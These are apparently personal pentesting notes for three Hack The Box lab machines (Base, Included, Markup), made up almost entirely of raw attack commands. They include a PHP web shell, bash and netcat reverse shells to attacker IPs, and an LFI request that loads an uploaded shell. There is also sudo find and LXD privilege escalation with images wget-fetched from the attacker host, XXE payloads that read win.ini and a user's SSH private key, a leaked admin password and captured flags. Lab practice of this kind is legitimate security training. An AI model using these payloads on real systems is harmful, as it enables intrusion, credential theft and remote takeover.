HTB - Base / Included / Markup

HTB - Base

This is not a WriteUp. This post only contains utility notes, exfiltrated data and research links for pentesting a test machine.

10.129.95.184

<?php echo system($_REQUEST['cmd']);?>

/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.216/4499 0>&1'

cmd=/bin/bash+-c+'bash+-i+>%26+/dev/tcp/10.10.15.216/443+0>%261'

$username = "admin";
$password = "thisisagoodpassword";

www-data@base:/$

f54846c258f3b4612f78a819573d158e

sudo find . -exec /bin/sh \; -quit

51709519ea18ab37dd6fc58096bea949

Achievement: Link



HTB - Included

This is not a WriteUp. This post only contains utility notes, exfiltrated data and research links for pentesting a test machine.

10.129.95.185

https://es.wikipedia.org/wiki/TFTP

https://pentestmonkey.net/tools/web-shells/php-reverse-shell

curl 'http://10.129.95.185/?file=/var/lib/tftpboot/shell.php'

python3 -c 'import pty;pty.spawn("/bin/bash")'

a56ef91d70cfbf2cdb8f454c006935a1

https://linuxcontainers.org/lxd/introduction/

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

python3 -m http.server 8000

wget http://10.10.15.216:8000/lxd.tar.xz

wget http://10.10.15.216:8000/rootfs.squashfs

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc init alpine privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

c693d9c7499d9f572ee375d4c14c7bcf

Achievement: Link



HTB - Markup



This is not a WriteUp. This post only contains utility notes, exfiltrated data and research links for pentesting a test machine.

10.129.95.192

nmap -sCV -A -n -Pn -p- -v --min-rate 5000 -oG allPorts 10.129.95.192

Portswigger xxe xml entities

OWASP XML External Entity (XXE) Processing

w3.org REC xml
External Entities

https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity

owasp.org/www-community/attacks/csrf

032d2fc8952a8c24e39c8f0ee9918ef7

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
<order>
<quantity>
3
</quantity>
<item>
&test;
</item>
<address>
17th Estate, CA
</address>
</order>

<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>
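The XXE payloads above work only when the server's parser accepts a DTD and resolves the entity it declares. As an added example (not part of the original notes), this Python parser reads the same order document with expat and rejects any DOCTYPE before an entity can be declared; `parse_order`, `ForbiddenXML`, `is_rejected` and the sample item text are assumptions made for illustration.

```python
from xml.parsers import expat


class ForbiddenXML(ValueError):
    """Raised when a document carries a DTD, which is where entities are declared."""


def parse_order(data: bytes) -> dict:
    """Parse a flat <order> document into {tag: text}, rejecting any DOCTYPE."""
    fields, stack = {}, []

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at the DOCTYPE itself, before any <!ENTITY ...> inside it is read.
        raise ForbiddenXML(f"DOCTYPE {name!r} not allowed")

    def start(tag, attrs):
        stack.append(tag)
        if len(stack) == 2:          # direct child of <order>
            fields[tag] = ""

    def text(chunk):
        if len(stack) == 2:
            fields[stack[-1]] += chunk

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.StartElementHandler = start
    parser.EndElementHandler = lambda tag: stack.pop()
    parser.CharacterDataHandler = text
    parser.Parse(data, True)
    return {tag: value.strip() for tag, value in fields.items()}


def is_rejected(data: bytes) -> bool:
    """True when the document is refused because it contains a DOCTYPE."""
    try:
        parse_order(data)
    except ForbiddenXML:
        return True
    return False


# Constructed samples: the order layout follows the request in these notes.
ORDER = (b"<order><quantity>3</quantity><item>%s</item>"
         b"<address>17th Estate, CA</address></order>")
BENIGN = ORDER % b"Home Appliances"
WITH_DTD = (b"<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>"
            + ORDER % b"&test;")
```

An application that legitimately needs no DTDs can refuse them outright like this; the rejection is also a useful event to log.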

chmod 400 id_rsa

032d2fc8952a8c24e39c8f0ee9918ef7

microsoft.com windows commands wevtutil

icacls job.bat

echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.33 1234 > C:\Log-Management\job.bat

Achievement: Link
